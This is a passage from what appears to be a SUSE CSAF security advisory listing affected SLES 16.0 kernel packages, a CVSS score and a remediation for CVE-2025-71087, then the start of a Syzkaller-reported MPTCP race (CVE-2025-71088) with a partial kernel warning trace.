"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-71087",
"url": "https://www.suse.com/security/cve/CVE-2025-71087"
},
{
"category": "external",
"summary": "SUSE Bug 1256628 for CVE-2025-71087",
"url": "https://bugzilla.suse.com/1256628"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Enterprise Server 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.6,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:H/UI:N/S:U/C:L/I:L/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Enterprise Server 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-27T11:51:02Z",
"details": "moderate"
}
],
"title": "CVE-2025-71087"
},
{
"cve": "CVE-2025-71088",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-71088"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nmptcp: fallback earlier on simult connection\n\nSyzkaller reports a simult-connect race leading to inconsistent fallback\nstatus:\n\n WARNING: CPU: 3 PID: 33 at net/mptcp/subflow.c:1515 subflow_data_ready+0x40b/0x7c0 net/mptcp/subflow.c:1515\n Modules linked in:\n CPU: 3 UID: 0 PID: 33 Comm: ksoftirqd/3 Not tainted syzkaller #0 PREEMPT(full)\n Hardware name: QEMU Standard PC (Q35 + ICH9, 2009), BIOS 1.16.3-debian-1.16.3-2~bpo12+1 04/01/2014\n RIP: 0010:subflow_data_ready+0x40b/0x7c0 net/mptcp/subflow.c:1515\n Code: 89 ee e8 78 61 3c f6 40 84 ed 75 21 e8 8e 66 3c f6 44 89 fe bf 07 00 00 00 e8 c1 61 3c f6 41 83 ff 07 74 09 e8 76 66 3c f6 90 \u003c0f\u003e 0b 90 e8 6d 66 3c f6 48 89 df e8 e5 ad ff ff 31 ff 89 c5 89 c6\n RSP: 0018:ffffc900006cf338 EFLAGS: 00010246\n RAX: 0000000000000000 RBX: ffff888031acd100 RCX: ffffffff8b7f2abf\n RDX: ffff88801e6ea440 RSI: ffffffff8b7f2aca RDI: 0000000000000005\n RBP: 0000000000000000 R08: 0000000000000005 R09: 0000000000000007\n R10: 0000000000000004 R11: 0000000000002c10 R12: ffff88802ba69900\n R13: 1ffff920000d9e67 R14: ffff888046f81800 R15: 0000000000000004\n FS: 0000000000000000(0000) GS:ffff8880d69bc000(0000) knlGS:0000000000000000\n CS: 0010 DS: 0000 ES: 0000 CR0: 0000000080050033\n CR2: 0000560fc0ca1670 CR3: 0000000032c3a000 CR4: 0000000000352ef0\n Call Trace:\n \u003cTASK\u003e\n tcp_data_queue+0x13b0/0x4f90 net/ipv4/tcp_input.c:5197\n tcp_rcv_state_process+0xfdf/0x4ec0 net/ipv4/tcp_input.c:6922\n tcp_v6_do_rcv+0x492/0x1740 net/ipv6/tcp_ipv6.c:1672\n tcp_v6_rcv+0x2976/0x41e0 net/ipv6/tcp_ipv6.c:1918\n ip6_protocol_deliver_rcu+0x188/0x1520 net/ipv6/ip6_input.c:438\n ip6_input_finish+0x1e4/0x4b0 net/ipv6/ip6_input.c:489\n NF_HOOK include/linux/netfilter.h:318 [inline]\n NF_HOOK include/linux/netfilter.h:312 [inline]\n ip6_input+0x105/0x2f0 net/ipv6/ip6_input.c:500\n dst_input include/net/dst.h:471 [inline]\n ip6_rcv_finish net/ipv6/ip6_input.c:79 [inline]\n NF_HOOK include/linux/netfilter.h:318 [inline]\n NF_HOOK include/linux/netfilter.h:312 [inline]\n ipv6_rcv+0x264/0x650 net/ipv6/ip6_input.c:311\n __netif_receive_skb_one_core+0x12d/0x1e0 net/core/dev.c:5979\n __netif_receive_skb+0x1d/0x160 net/core/dev.c:6092\n process_backlog+0x442/0x15e0 net/core/dev.c:6444\n __napi_poll.constprop.0+0xba/0x550 net/core/dev.c:7494\n napi_poll net/core/dev.c:7557 [inline]\n net_rx_action+0xa9f/0xfe0 